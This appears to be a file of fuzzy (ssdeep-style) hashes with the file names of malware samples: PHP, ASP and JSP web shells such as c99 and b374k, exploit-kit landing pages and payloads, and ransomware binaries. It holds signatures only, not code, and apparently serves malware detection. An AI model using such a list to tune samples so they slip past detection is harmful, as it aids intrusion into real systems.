+3072:pxnLhTCLCP/RJF2B2RQrAcObHEQgnyPxy:pxLOMRJIePb8yPxy,"body.113.337"
+3072:pxezJaoDFKVvCn8Ng2boToKusmDKCxeP0bZ:pxezJaoDFMvCn8VTWEM4Z,"2016-01-29-Angler-EK-landing-page.txt"
+3072:PUFrp3JPbYUFUC5iDnGOhD09g1pIIzC3I:4bYUFUC5uIS,"body.122"
+3072:PUFrp3JPbYq488EBBZCJaE1D+/Or9W9IBaPI+C3X:4b5B3CJiP0,"body.138"
+3072:PUFrp3JPbyAsxGit/boop5D0OOW989DVIwI+j3q:4bKLwK,"body.131"
+3072:PUFrp3JPbxXkPDEpAfJ8dAAOJ1T9j+RgVP0I+23A:4bx0PDEwJv0/,"body.113"
+3072:PUFrp3JPbWtnGU7o+fLGhDgrOuO+9QXmsvI+P3M:4bWtGU7o+q2iQ,"body.128"
+3072:PUFrp3JPbUSGMDACpyKmslrD8kOFr09fvyAItYNh3V:4bUcRmslSA9,"body.118"
+3072:PUFrp3JPbrxO9CF6wradDNIOzOS9Wr6DI+B3E:4b1O9CF6wr0DK,"body.121"
+3072:PUFrp3JPbQGHozwqv/+Mt0ZvhUHohzCDsIOESC29T9Tq6pIzM3p:4buz110Zv9xjpt,"body.133"
+3072:PUFrp3JPbpheJ2uN++2ancNzEQ7jd/YOw9r9NEpCIt53a:4bpheLN++2DzEQ7nCz,"body.116"
+3072:PUFrp3JPbo4hb1u/9T2DnUOh7r92DIFItn3V:4bo4hb1u/GFm,"body.119"
+3072:PUFrp3JPbkUX9MAKBHqCDX8OEO+9FGUlI+E3z:4bkUXxKIlc,"body.137"
+3072:PUFrp3JPbkp2hiiSNOEON7FEt1DhGO1qT9VuP2ItK3Q:4bkpbtAitn2k,"body.126"
+3072:PUFrp3JPbJ9AzXC8JtDByDY4Ok789LCm4Itj3R:4bJ9AzXC8JtDB/46,"body.120"
+3072:PUFrp3JPb/j6fLWNNzWDPrOLOW9F5IlIzJ3x:4b/j6wolE,"body.130"
+3072:PUFrp3JPbhxpy0jaFZDcJOi909FXvhI+J3P:4bhxpy0juhhl,"body.127"
+3072:PUFrp3JPbHKdGji7dBVD4zDTcOSDT9PgauI+536:4bHKYirVzuc,"body.123"
+3072:PUFrp3JPbGrdqdilFtdKOOR+DT9v7yMIth3O:4bGwkleLMt,"body.117"
+3072:PUFrp3JPbf8mb/W/GcsDMDJ/ChDi0O6709wqPPI+h30:4b//W/GcsDMNPS,"body.124"
+3072:PUFrp3JPbf34qj+njmQ2luf2uxmdAkOp1+9c86rI+E3S:4bf34qj+njYluf2ux/rr,"body.115"
+3072:PUFrp3JPba7JChC6lCzL0IhDMDOKp9T93hv4ItE3n:4bakhC6lCMICH41,"body.129"
+3072:PUFrp3JPb8PG+SaEZzudJSDHiOJr+9cWpUI+B30:4b8PG+SaEZzudJdU2,"body.135"
+3072:PUFrp3JPb8ILmpnOdzzOJOr9ccmFIzn34:4b8ILmpnFL,"body.114"
+3072:PUFrp3JPb7RzrYnwNBVBQTbDdNOE709VHvmIth35:4b7RzrYnw/3QTumW,"body.136"
+3072:PUFrp3JPb45XL0CixlODaAO4rW9j+RgfSa2I+53N:4b45XLEl52j,"body.132"
+3072:PUFrp3JPb2hgvfvzKqDAOO6DW9TlvYItN3f:4b21YE,"body.125"
+3072:pRIs4IisuK2LhHv5Vqj8z3gF0uyy9B8lBE73vKg3Nd:pRIvsuK2LhHv5Vqj8MF0uyy9B8lBE7fT,"dq.txt.1"
+3072:pRIs4IisuK2LhHv5Vqj8z3gF0uyy9B8lBE73vD+3Ng:pRIvsuK2LhHv5Vqj8MF0uyy9B8lBE7fl,"dq.txt"
+3072:PpvTUsMBi9Is2kK2LhHvsVqjqz3AFbjlvWBXQND23ZEqsNQ:RvTkY9bK2LhHvsVqjqsFbjlvWBXQND2J,"acid.v1.php.txt"
+3072:PpnS3gvLz1FCNqZvk1JF0zgaa3kdq5pHPUvD0n/JjLj:PRS3gzhs0Zvk1czgF315ED0/xj,"b47e5a6929f7267e5dcae0691664af7d_php.txt"
+3072:PnLgu3zdzpNMwJZXK2LhHvsVqjKa3BFMXP8AdTjIpm31+:PnLg2hpNZJZXK2LhHvsVqjKMFMXP8Ad0,"bhl.jpg"
+3072:PAGY6+muNH9qXhC9W095T+3WI3+JO9a8QNWE2BZ7Rti:PAGYCuNdqXhC9W095T+mI3+JO9a8QNWS,"c99_webshell.php"
+3072:p8rNsBNX9uFxv6pXoz7LXt20Nav0CutfwImMv9g2B3WYGpSuugeZzDWutPWaBAG0:Vkb9BK,"phpspy2011.ccc"
+3072:oyowBu7N6DKrfcZpS4tXnOXUdbLr5DSS/BrJNvnpDfdzWooTkLp6zjbRu:oy47NoKrfcZpS4tXnOXUdbLr5DSS/Brx,"c99madshell_v2.1.php.php.txt"
+3072:OxXDWEi8HsY99UBCp03fKq/twJngnSPCy:OxTWQH/9UBCp03fKwtwJgSPCy,"body.113.188"
+3072:OxRLxHpySIlD4mp1FLsXnhKp7RnmgnyPOy:OxZ5pySm4mp1tGE7FyPOy,"body.113.352"
+3072:OWPUFvOMww16i2rMIa+v517gxMmVxPWqt5:pUFvOMww16FMIa+v53qt5,"SnIpEr_SA-Shell-v1.31.php"
+3072:OWPUFvOMww16i2rMIa+v517gxMmVxPW11t:pUFvOMww16FMIa+v5311t,"SnIpEr_SA_Shell_by_SnIpEr_SA.v1.31.php.txt"
+3072:Ou9X2ihtVo32307e2unDamEC2+/yq4UjUx:Ou9Xdoj7eNmmEC2+UKUx,"yyihacker.php.txt"
+3072:Os0oAKlewbwa5Mcv5/zWr6JQhWRuEMRiMiZ1/ykWuyzLCTHDOFyjgnRoH05r:Os0odwG9McBg6QHEMIMIX4RoQr,"2016-02-15-Angler-EK-landing-page.txt"
+3072:OqKtYz5kqsrFANLStm9cQG6hHhMM60IOKzaXQC6cY6ECl+2bVxFah:O3tYzaqsTtmExM60PXQCt6O+2bgh,"import.php"
+3072:oG1pnibIv/4dk7MiiKPB82EUpbSFwY4jhZp:L15ibI4dkNLC2btSFwJhZ,"2016-05-26-Rig-EK-payload-Tofsee.exe"
+3072:oCZ013mGWZa11bMPqvFsuGZ0FzEbMcD+zXLVc5mXCAR5qyg/2vhbFZNkPAM:h/75PqvFsIzEwcD+zXLe6RPwPAM,"pwn.jsp"
+3072:oBVN/Ly+WxpLaVZA1mijrZhAyxz2hKJl1:oBTLykDITjlIhKJ,"NetworkFileManagerPHP-v1.8.private.php"
+3072:O6dLM+RfE70iZntHt+zbFMlm/WaZkVLWHQIuk2QppeBZzFbB81skso:O6Bc70OajBZkVEuk2Myj81skso,"2016-07-15-other-Neutrino-EK-payload-Gootkit.exe"
+3072:O34Nf+pS485nG9M1rYZwzE0L5UeV2NLbG0Hy8zpliNJ0JEZgynE0CZ1DhAo1MmcF:FfPG9szzEgxkpG0HyovCcyE0AXAeMa/,"2016-04-26-Bedep-post-infection-CryptXXX-ransomware.dll"
+3072:nzT3+a/GSXptukBDQvIo7oPAZA3rlHXs2m/:nzT3p/G6ptukBDQQo7oPAa3+/,"c99shell.php"
+3072:NY5Oh86N4nFrMs8GY0knR1pFMz22ugQJE/qmzHjy:5hV4Fr/YpFMHuaDH,"2017-02-23-EITest-Rig-EK-payload-Dreambot-rad73A09.tmp.exe"
+3072:NxhlqvLLLN7wkhDVjBv3Y2z9Lp3b3jvnkdtSA:NxniLPHBY2z9prjP0F,"2016-07-14-other-Neutrino-EK-payload-Bandarchor-ransomware.exe"
+3072:NxALYJZZ/qLmcmxEu+kwLqzTzeFgnyP9y:NxI4ZZ/qLmcSY/LqzTpyP9y,"body.113.364"
+3072:nVyz5kMJYafYka53p7u7BBLUkfktEO/zbMGSlhQ9tYdJmD+:VgkMN8tuVBLUKkkG0hQoG,"2016-06-29-Rig-EK-payload-after-gate-on-45.32.187.36.exe"
+3072:NSBoTU17O10qUFHS9/5JbQe2UDuvhGrR1u60xok:N89OGLM93Qe2UDuvhORR8,"3ea0916abc1e90296e8160f469e46429_php.txt.orig.001.001.001.001.001.001.001.001"
+3072:nrI52ReHNdAFnfPPShREuMPb9YlVVRxpop2i0KKCXrXSbS4KcMy8ZZL5QlcSCSLw:yNdA+Myl7TpNiWCL4EycZb4,"Ionic.Zip.Reduced.dll~1"
+3072:nny48jnsnLQ7oacFpH5fTMwMtM+UCp2m11npWX/r:nnyDnsnLQMacFpH5fTRaUCkmpWX/r,"2016-02-10-EITest-Angler-EK-landing-page.txt"
+3072:nM3+a/GSXptukBDIHIo7oPAZA3rlHXs2mr:nM3p/G6ptukBDIoo7oPAa3+r,"c99shell_v1.0.php.php.txt"
+3072:NHfQFALEvU6sCEqSUyX9DqIo9So3zJOpjdsJNERBN0uVXl9xqtouE6WwKUsYY5KK:NHfQFALEvUbCEqSUyX9DqIo9VDJipUNi,"Gh0st1.0-ghost_source.php"
+3072:nFITJTUnazOV3kD23hKKn35UhzEEDUT8gRANIwncc0:FITJ6kOV0SMc35KTg090,"udf.dll 专用网马.php"
+3072:ndSbrbJeifkRCQLGAbApEDs/jPSJCEubyby:nIQif8IpF/LGD,"2016-06-01-Rig-EK-payload-Tofsee.exe"
+3072:nDhZxW1lFcxIgz1sOvf7PWxoXTFZwdj3nr:jxW1I1pVpA3r,"b374k-2.8.txt.001"
+3072:n53+a/GSXptukBDIHIo7oPAZA3rlHXs2mr:n53p/G6ptukBDIoo7oPAa3+r,"c99shell.php"
+3072:n1lGuMxyopb/kHE11ELoP9LrFMrzLWUPEHk:n1Izy6b/j8oPpmrzLWUPEE,"2016-05-23-pseudo-Darkleech-Angler-EK-landing-page-first-run.txt"
+3072:n1lGuMxyopb/kHE11ELoP9LrF4rzLWUPEHk:n1Izy6b/j8oPp+rzLWUPEE,"2016-05-23-pseudo-Darkleech-Angler-EK-landing-page-second-run.txt"
+3072:myVD/1b7zrA3v2Nc3QKGRKhW+Po8dbphySakPW/p:myVDNfA3v2Nc3QKGRKhW+Po8dbphySal,"2016-06-20-page-from-contaratosbeach.gr-with-injected-pseudoDarkleech-script.txt"
+3072:My2i+CkjUbYgr5ctfq7xdbx7D6/U7KE88y9uYlO1KnVQj2HcSgecdrHhgsauuj+n:MyYP1JuKc+HcJPB9TyNqfG6,"template.php"
+3072:mxyqNAdBVGW3zYNYCifubdTc2JpgnSPGy:mxTNfW3ciCifubdTc2JOSPGy,"body.113.204"
+3072:mxCuDIL5p8ei6wmamD16URaee1XJxgnSP6y:mxjDbei6wmamD16URaeiJ2SP6y,"body.113.148"
+3072:mwyvDqpneyyXZFHkmt5uj3lbfa/9fobLw2/LrjRqLj/8sbnHofd:oLs,"ASP.NET-Web-BackDoor-01.aspx"
+3072:m+wIzGTXAqfk4HYlN25hq4hFQm14IJNnwIhOq3:+YuxHagnQubZ3,"shell.asp"
+3072:mtibaj5IXGI7bJi0+hEONv7SuJUFVXu8Rv8hp:+iEiWI7b0hp,"ob-malware.php"
+3072:MqZM5OH3nvz7rc3H5ZkZdrA/c4bHMuyrIjsOuZCuN8g6QTOCo:zSIH3bPcpZywc4bGrIjICuyg6QTOCo,"2016-04-18-EITest-Angler-EK-payload-Panda-banker.exe"
+3072:mq1MtDuWL7Bm3drkTzBcMfjJB/RotMxByQkT+i:hQ/I3wtLjDZqgyQG+i,"在线exp专用免杀版.php"
+3072:MoNFsRtaNv+3YI+4oOydaxBQMePX6PQvQxdLbxb7ftejuSWgT7Pid:MoNFsRtaNeoOydaxBQMePX6PQvQxdLbn,"b374k-2.4.php"
+3072:M/JymlycRlFxD9TD9trAcXfzBN0lzTzcoqu:M/JdTDrLzBN0lzTzcoX,"Anjiyo.txt"
+3072:m8Dsp+FNX1dFOvDlXJub3wQOJuEtk1nuCoAwzalYyvDwf1H9U7lv:m8dNXSEbgq62nuCoBzXyLwf1H96lv,"2016-07-08-Rig-EK-payload-Cryptobit.exe"
+3072:m0wXgje8KManBfTMdGUadqrqAFf1Xs/Ei6ixhG9d2h76ouREGWM/rEdTwWO5:mhXgjSRgdGmrqA3XKxhG927L2EfNtW,"ShadowBot_Sep2008.zip"
+3072:LX11nfI4SZdyMpbNU2CAB2qbtzAIMnBGzYD9w0Js6umH4N:x1ngRCM8AB2qbtzZMnBGcw0Js6udN,"VirusShare_9655cdece49b05bbd989b0d4dcb32e26"
+3072:LV76N7dPtFQI82TPyzPGp6V2NI3IDzuz48r9P4+yPO:LF69dFFQCPyzPGU2NkIDzuz48r9P4+yW,"VirusShare_f8c1e49956e6fecaf6047e0a3febdb67"
+3072:lTsE0QeBnwbk3U/06j1x238xHmlA7tgUOkdY6LaUCTk:lTsnBUr/h14kGFNz6OUCTk,"2016-03-18-other-Angler-EK-landing-page-after-1nationradio.com.txt"
+3072:lTsE0QeBnwbk3U/06j1x238xHmlA7tgUOkdY6L5UCTk:lTsnBUr/h14kGFNz61UCTk,"2016-03-18-pseudo-Darkleech-Angler-EK-landing-page-after-neways4us.com.txt"
+3072:ltB1+tAJVkqs++MRjMWK85h7J3vE52kr0spt46cc:ltB1+tAJVkqs++MRIWKkh7J3fsptQc,"c20cb484041b0d93302734bdf2d5b68a_php.txt"
+3072:LrrT/dmTtQT6hMGvNFCg6EN1w5lA8ABEODwDMsJ4psPiSZ/Pc:LrrT4mGvNsVEN25lA8ABEODwDMsJ4psi,"c100.php"
+3072:lqh+dVIiiVnVvRz5Tz8DhLEAz6DTTAuSjkFj13lkZdv8qHld/HJmLLw9Q7CfaTum:nVIpVnVvRz4IA2nTAuOkDlkgPLLw5G,"fx.txt?"
+3072:ljn8EouFI1+KrsA2t/TP+8CKoYx+GIvT6d4Ioft+Ht+:N8rCegztbW8wPvOrofQ,"2016-06-30-realstatistics-gate-Neutrino-EK-payload-Gootkit-after-tne.mx.exe"
+3072:l82WCbc4N6jqL0ituut0x8Bg2NnSsE2RUzWotzb67+dBH5A:l82WCNIqL0ituut0x8Bg2NnSsEmUzWo6,"c99shell-v1.0-build09.php"
+3072:l7VXb7dijqGv1r8/7QyrgudxUtbEcM/WTMt4K5ole73WGv:PXtevkxj4K5qbGv,"AspxSpy2014Final.aspx"
+3072:l4k3pHqF6aRVtp0MgGaEwASYJrUb3M60P+x0HmbEVLLSLfmo0h7yDb7fCXcBkbCs:ppg6Abp0MgGaErlJSBEVaLOJZo/NuK7e,"2016-05-31-Locky-example.exe"
+3072:Kx2dlktt2fmHscuaPQZeNyIRYQFgnSPay:Kx27ktt2fmHscuaPQZeNyI2QaSPay,"body.113.240"
+3072:kTwRPBWQNhUsZpM2SyB83rbvRr8qUu3N/BsnQDzaMI68ZxlIIUv8qHld/HvRXk26:kToFlx8bbvRFZ3AQirxlIIfmXk26,"c99.txt?"
+3072:kQnZHr1EKd2v9B+lT6RVMkELO7+YbdeQXm42cZyOYx8R9SO6f5sWZeWBIMKl7A8R:kQRr1xAv9B+lTcVMkELO7+mdeQ3qOYQ5,"sett.txt.001.001.001.001.001.001.001"
+3072:kPP7UuUlT55UgnqEw1b32aHZmS/bTn7xOpealJL:kPzUuUlT5jAx0Yn7MUavL,"b374k-3.2.3.min.php"
+3072:K+P26N7dPtFUIs2uJ3T2Zr6uVYN9w5lDkAh0ut+VCaxQ:K+e69dFFURJ3T2ZGaYNu5lDkAh0ut+VG,"c100(1).txt"
+3072:KnLtIH2+rLyZNQHJZwK2LhHvsVqjgl3BFOfPvpdyL7YR3F:KnLtCaZNAJZwK2LhHvsVqjgHFOfPvpdz,"McN-shell-2008-c99-variant.php"
+3072:JZx13nN/f0tYQVskqruQqWg2B3gE6EJLgnSPGmy:Hxn/f0tYQs6QqWg2BQAJESPXy,"body.113.217"
+3072:jzIB7Fd0/dEegVd9eKPX5oHw4rz40+Sz3zaOeWLGi:jK7Fd0/JotPXudcgz3zaOeWLGi,"2016-02-03-EITest-Angler-EK-landing-page.txt"
+3072:Jxyk3L3S3H2V112t9PNucUV7UJEvu7JIgnSPdy:Jx57CX2V1S9PNucUVoJEIJBSPdy,"body.113.232"
+3072:jxWJUvInVBV4emCzxBjrxOwFTuZJfgnSPjy:jxcUvInF4YzxBjfTuZJYSPjy,"body.113.136"
+3072:jUJ3lrFWpwMzM3SsMZOUr55IJYOT6URwByVIzkb34:npwMzJsMZORuBOBU,"body.415"
+3072:jUJ3lrFWpUo6/9yfCHJUrf5Ic3W6MoyWwOI+ab30:npUo6yfCHJnWdWI,"body.408"
+3072:jUJ3lrFWpTFyJBg4kSJHUrf5I4iT6MPpfNItgb36:npTFyrgHSFPfNp2,"body.410"
+3072:jUJ3lrFWptbHjpjzhUr55I89W6inrmmkItPb3D:nptbHjz5mmks3,"body.414"
+3072:jUJ3lrFWpSxR6YC2FFFUrqvIi3W6MQwBhItvb3L:npSxkYjFF+BhKP,"body.405"
+3072:jUJ3lrFWpRv82fH6aSnUrfvIi386MHrmrItHb3F:npbfaaSndmrmh,"body.402"
+3072:jUJ3lrFWprFzlQUCdTgxG43Ur5vIzkS6U5avWIz+b3T:nprFzlQUCdTgw438vW9P,"body.419"
+3072:jUJ3lrFWpPTaQJKP5UrfvIURT6k1Uv6Iz5b3g:npPTaQJKP5Nv68M,"body.403"
+3072:jUJ3lrFWpK9HA4ZWNZcr++SSpTz4UrY5Ii3r6MCmwJI+vb3e:npIHA4ZWNZcr+tSpTz41wJ7a,"body.401"
+3072:jUJ3lrFWpH44w1PYpH34+cbUrfcIluW6UMrmxIzwb3y:npH44w1PYpH34+cbXmxb2,"body.406"
+3072:jUJ3lrFWpDE+Fu6gjridrUrqvIlgT66Fx3VI+ib3b:npDE+SridrX3VGn,"body.416"
+3072:jUJ3lrFWpd7wOprCTb5CpUrfkIz2+6MjmwBItib3e:npd7wOprK5Cp9wB/a,"body.420"
+3072:jUJ3lrFWpckgOUUrqkIiUW6MhpfoItib3F:np9Usfo1x,"body.412"
+3072:jUJ3lrFWpb9sfebTXxZXUrYvIW1r6MPUvRI+Db3z:npb9sfebTXxZXkvRP3,"body.407"
+3072:jUJ3lrFWpB0AQgcZrhGN9SUrYvIegW6MZx3cI+kb3k:npaAQPrhGqF3c4w,"body.418"
+3072:jUJ3lrFWp8/XaDR3ZmZRSSGpPNovUrf5Ii3T6MDI1hItNb3C:np8/XaDR3ZmZwSGvovj1hw+,"body.400"
+3072:jUJ3lrFWp7InWNdNx6gxoorwDfq1qUrfvIK986MCrmJIt2b30:np7IIdNx6gLrufR6mJz4,"body.417"
+3072:jUJ3lrFWp4fp1ukr9Hj1Ur5vIrNT6mwrmsI+hb3F:np4f7jMms9x,"body.413"
+3072:jUJ3lrFWp4+32gfK+K2UrYkIK/06lFrm5ItDb3A:np4+FfK+K22m5+0,"body.409"
+3072:jUJ3lrFWp2VvK710yt2RDdxQCDUrqkIwN066cx3IItNb3h:npj710ytADdxQeY3IQt,"body.411"
+3072:jUJ3lrFWp1JxZqFmYfUrqcITur6U56IdIzBb31:np1JxZqFmYfvIdCZ,"body.404"
+3072:JU/5b17IKpz6E3JdFuoMdHIjMjDOROS9+acqvcWI+7b3+:cpz6E3JdFufH50cW3a,"body.233"
+3072:JU/5b17IKpXE/OWV7F3jD88O4qSaDfvcoIz6b30:cp0/OWVdccoPo,"body.234"
+3072:JU/5b17IKpvRuDdT+alC2aD4ZVEoWkjDWOOoD8aMAwBHjItib3Z:cpoDnZEoWkeBDfd,"body.231"
+3072:JU/5b17IKpUfS95qPjr1gxKbjDXOOEO8aD4PO/Itgb39:cpUfS95qPjr1gxKbiO/Pp,"body.229"
+3072:JU/5b17IKpSMP3w74tCUb/dCnjDjHOm70aMQwBZI+kb3T:cpSMqUmOBZQ/,"body.221"
+3072:JU/5b17IKpRfYjD7OOoq0acxvcRItib3w:cpRfYgcRfs,"body.232"
+3072:JU/5b17IKpQPIW5twtRjDAOOOO+aDbyWQItsb35:cp/W5tUpWQld,"body.222"
+3072:JU/5b17IKpP8k3S+X+u7JEiBxdjD1OOdqTaDLvcmIzEb3W:cpP8k33+u7JEiZlcmDS,"body.223"
+3072:JU/5b17IKpnmxuyH2GIIVHY8n3Mg4rl4jD2xO3q8aclvc2IzVb38:cpoIIVHY8n3Mg4rl47c2m4,"body.224"
+3072:JU/5b17IKpLs1C/lkjpaseBQjD4OO79WacT6IzI+Ob3U:cpLs1C/lHseBQSIzCo,"body.225"
+3072:JU/5b17IKpl3VUIP2N8U8s7zLdQAjDCBOBO+acaI1GIzOb3F:cpl3VmPlLXn1GD5,"body.228"
+3072:JU/5b17IKpK6jOAaXejD9UOlrWaD8avhIz7b3k:cpK6jOAaXebvh+Q,"body.230"
+3072:JU/5b17IKpJYA2WjDw0OFDTacIPOfhIzgb3U:cpJYA2WLOfhro,"body.218"
+3072:JU/5b17IKpfMPY6wklsvjD0CO1OTacgavnIzVb3q:cpkPY6wjlvnmW,"body.227"
+3072:JU/5b17IKpBPVTOv+93+qcqwv/jDV0OzqTaM5x3AItib3Z:cpzTOvk3+lHk3Afl,"body.219"
+3072:JU/5b17IKp7bMXeJoHw0jDJOOS1SaMPI14rI+Eb3F:cp3MLy14rAB,"body.226"
+3072:JU/5b17IKp1RFnMovvO761QFjDG5OarWaMHvcSIt4b3h:cp1RFn+7XFzcS1V,"body.220"
+3072:jQAiifopK2LjFkalqEbFHsD8Tr9MysawxEzLhWEN54pR:ZiUopK2Lj2alqEb+D8Tr9MysawGzL7Nk,"Fx29Sh-3.2.12.08-cc.php"
+3072:jMSynCNVuG7oituutQxCGsBeHjzXoCsN5o3r4sQHpD:jMSnN8G7oituutQxCGsB0jzXoCsNxsQN,"c99.txt.002"
+3072:jiNsSEgVRrs5Wwce71rtRx9sK38L6mSSSSSSSSSSSSSSSS3MgYJ:/ceR1l66zgY,"2016-06-28-Rig-EK-payload-after-monavocatparis.fr.exe"
+3072:jFN4JbFOdsQ7H7LOO6is+gTRljbk2QkaN6PLlR/g3KWweJ4b8IPWxUwh:pNWbctHHmzTd9ooi6PbI3RTJ4b8DxUO,"2016-03-02-admedia-Angler-EK-landing-page-after-dompetdhuafa.org.au.txt"
+3072:JE23hgyBMJPgf7+j3Q49YOv25JRmMK6+UnP6y4O8aUg/tK1eq+De:JE2RgyBMlgf7Q3Dxv25Jr1bZagVKZ,"2016-05-19-EITest-Neutrino-EK-payload.exe"
+3072:J5qEOeA7ncV7YUacdfqrBfBripKnn5Mo4CEhZrLtB8f4NC/6cTljM5EC8poZAsx:XqEOeXV7YCqrBfBripKnn5Mo4C2xLtB5,"phpm3.txt"
+3072:J4NPsmNt8S/yOW8wDAF3s2hD4xOdGHND6x9xtRVO4zwyfMARL:J4NPsmNlnW8wDAF3s2hD4xOdGtD6x9xx,"mini_b374k"
+3072:j/19Lz6poJuBksc+Yvxap6b5PIw3EHhQXmte:jfL6oUOscxa4b5PIw3EHhQXmte,"C37Shell-v1.1.php"
+3072:j0UaWSb7jbDnd5Vb6paNbr4A6yKRmdKnS8+dhkBgHbuU8Q4Wu/1pPGl867lC:jnSb7jbDzVGchpQRmdKedqUCTJWu9wl8,"2016-06-02-other-Angler-EK-payload-CryptXXX-after-woogerworks.com.dll"
+3072:IYcs5yCWgNhDKrgituutTrmaKByfRizKo+rO17oKVH5s1E:IYcsigNVKrgituutTrmaKBypizKo+rO5,"c99_by_Shadow_Preddy.v1.0.php.txt"
+3072:IYcs5yCWgNhDKrgituutTrmaKByfRizKo+rO17oKVH5pto:IYcsigNVKrgituutTrmaKBypizKo+rOO,"c99shell-bd.php"
+3072:IxPWUv0nVBV4emCzxBjrxOwtpCgDwaytiJ2gnSPYy:IxOUv0nF4YzxBjTpCgsNYJzSPYy,"body.113.138"
+3072:ixpHll4E3Te6fBxv9cG8VhXDtqzJRgnSPO:ixfcG8VhXDtqzJWSPO,"body.113.089"
+3072:IW9H046Q4sN3igg8wqvGsYCGZSEkxvHW2Jz2Eqc70b9maWEB24904A1903Ik4Y:ImdjvwqvGsYdkx/W2Jz2E5yYQtIk4Y,"x.jsp"
+3072:IrAZuVz8+keezmmJb+rf26J7ZkejhiyQzIVT+fK3XP:IrKq8+5Xkah/Qzq+inP,"2016-07-26-pseudoDarkleech-Neutrino-EK-payload-CryptXXX-second-run.dll"
+3072:INR9+ewZY7Hf+U9OunacLDpAivSc3PJOMjOs2qVmVl0uVXl1h3eGulgE8LA91qiA:INR9+eyY7/Z9OunacLDpAivzfJBy3qVy,"Silic_Group-six-winged-angel-Webshell-v5.1.php"
+3072:inMtqaki1UByupuOQ7oAUTcxU4VNVQsycjzEy:iMhQMKuOQcK+4bUcjzEy,"2016-02-24-admedia-Angler-EK-landing-page.txt"
+3072:inMtqaki1UByupuOQ7oAUTcxU4VNVQsyAtozEy:iMhQMKuOQcK+4bUAtozEy,"2016-02-24-Angler-EK-landing-page.txt"
+3072:inDmnKPVyxtL4CbxcG81VJTPwjpyjwoUY:inanaAx94CX85TPwj7Y,"ShadowBotv3_March2007.zip"
+3072:IjSWUQGaccZMk+BxhKBIii/Fii/4gx4TsGJvok0XsN+2pcvILe28lX4Hph4p2oec:IjS5QGnKsGJvH5yEYXwjQq7GPchpWn,"2017-03-09-page-from-hurtmehard.net-with-injected-script.txt"
+3072:IBjGOjkpLxWv0EDAOvPPhWqT8e+DgUssWg0poYkR3zEzS+nccuNs7:IBqpLxuHP8VWUVd+ncm,"h4ck_Door.asp"
+3072:I4gdJ3PqRd40EndD8DPB8D/mCm3wTNS8xHuYPIjYzu8Qa8/FOaBocAVIx2:I4gdJ3Pqn40EndD8RhATNtOYPc3/nBo/,"2016-03-29-Nuclear-EK-payload-after-macfly-studio.com.exe"
+3072:i2RaSQK4Ehvp25+RBf2H0au4rUKPiiDdRvSW1LYINirsTJHZTQj4W49sUlbH7M8w:VRaSo1LYNsTJHZTQj4W49sUlbH7M8v1O,"smtp.recon2.phps"
+3072:I1UwfGgW3Ag0FuhCF4mEV+bYflQvs/SolH3yKyYxSdG7ItV97+zlZ:rH3AOu4mELAYfWySdGgeZ,"2016-07-08-other-Neutrino-EK-payload-Gootkit.exe"
+3072:hx1LBrfmgnxVuQjuIbFsv6NsmQMf+d9gnyPBy:hx1Br+gTuQjuIbFsv6NlffQSyPBy,"body.113.297"
+3072:HwyvDqpneyyXZFHkmt5uj3lbfa/9fobLw2/LrjRqLj/8sbnHofd:dLs,"ASP.NET Web BackDoor.aspx"
+3072:HwDJAwr39F5NmT1a4e3/gIagoL7qkds+RhQ+Ym2lOmQxkfjV3B:UT,"ASP.NET Web BackDoor.aspx"
+3072:htZQkyRinKmCXjyL40iRb4ts/BrQ3h2N5qzfki1iU1TiUEjPITfYM7:/ZMiKbjgs42zO8i1iU1TiUEjPITfn7,"NetworkFileManagerPHP.jpg"
+3072:HrMkqJRrlgWJfaYiMMH2OoQKOBFIGhP/dKBMjQ6c:cxg8ONKOPN1KBML,"2016-06-28-Neutrino-EK-payload-gootkit-after-mu-media.co.uk.exe"
+3072:hm7gKpnI07baVlTW2xXqIwVoohwnFTCUwf6Cs3DlK+PHs2KMf0wG9jVoPGGO9XMd:kUc+LT5w1VnhwV2f6Cs3D3HXKMf6o,"php网站打包（dodo）.doc"
+3072:HLkNxLN6qX56P9LKOjiwEgiHfyA3donFKJaX:HLaL5Xo1LKsEgYfyA3donFKJaX,"c37.v1.1.php.txt"
+3072:hj6pZEryOu7m4Nh1POWd7Rc6A/TlEh1G9N1Nms1zq5urYSiS8t1FsOMbg8bkEMI0:ZSErZOGKXDLiof,"dir26.php.txt"
+3072:HizxgR0QHX33333UlH4RRRRRRRRRRRRReRRRRRRRRRRRRRRRRRRR3upMrd:CWR0PlVqMrd,"main.txt"
+3072:gyUpIoRGNLAV9UiGbkYdMHYqDa+hfC722Z3V37i:gyUpIwGNkV9UiGbkYdMHYqDa+hfC722S,"c99.txt"
+3072:gxyLf+SgonsxSs+Nop1wwmwX7tvcNn3iXep1GgnyPUy:gx+mSgonfs+Nop1wwmwX7tvgyOpJyPUy,"body.113.351"
+3072:GUYikkkkkkkkkOltqsSQJPRQOWnmFGLGOaTsO7scuRnix4R/LDhwmENzpxG1Mdee:JYikkkkkkkkkuqsSQJDOuP7cRnXnhUco,"2.jpg"
+3072:Gt+sSOjfMTxebJUNVCIZmsyMu+294J0I0S9cEPqwORoZyvUxGon8MMmopxUlxJaQ:46OqxebJAZm4k945l9c/RosMx7fMmop2,"iranshell.rar.001.001.001"
+3072:GsCfGz7XOfhrOyErvM1p9KhrsFuHnGfGcb:GsoGzOuzM1D30nGF,"scriptNetworkFileManagerPHP_by_xoce.php.txt"
+3072:Go75Rmi1WpS8bQ0ew7EMhk0PiwLTFYGJiqBERDFDlEIcxA0nKu+t+x9Q:95RXMpS8fhkWLTFYoBQJl3u+sQ,"PSEXESVC.exe"
+3072:GMDynWNVuG7DituutQxCGsBeHjzXoCsN5o3rgsQHp9:GMDlN8G7DituutQxCGsB0jzXoCsN3sQD,"c99_by_KingDefacer.v1.0.php.txt"
+3072:giSog6DZqmvP8HO0wb3iuCKcQViFiQKmQqY9P8S4/tRm6VWHkGzWQQor88oFUFDP:q6qWQOTb3rc4iFilotRpITwOSS,"Backdoor.ASP.Ace.cw-SqlRootkit.asp"
+3072:GDYikkkkkkkkks2qsSQJtGbp8klaQcABQlM5jf+WUFpK0wuczuJ:6Yikkkkkkkkks2qsSQJC81QcACllWUFv,"3.jpg"
+3072:GDjSAYxScIl3i8yq+a+uPgXqMO112zs/rGchMK/oQt9duKL:ojSAPXV+rOAzs/DWgp,"1.jpg"
+3072:G/CiK3TU9bOCAbQDJWWL4nPXiFdJ7pGDwKcYiBTiguvFpGHKclmzEzJ:G/CJ3qb9AbQQBPSLGDwKMDU2KMzJ,"ZeroAccess.zip"
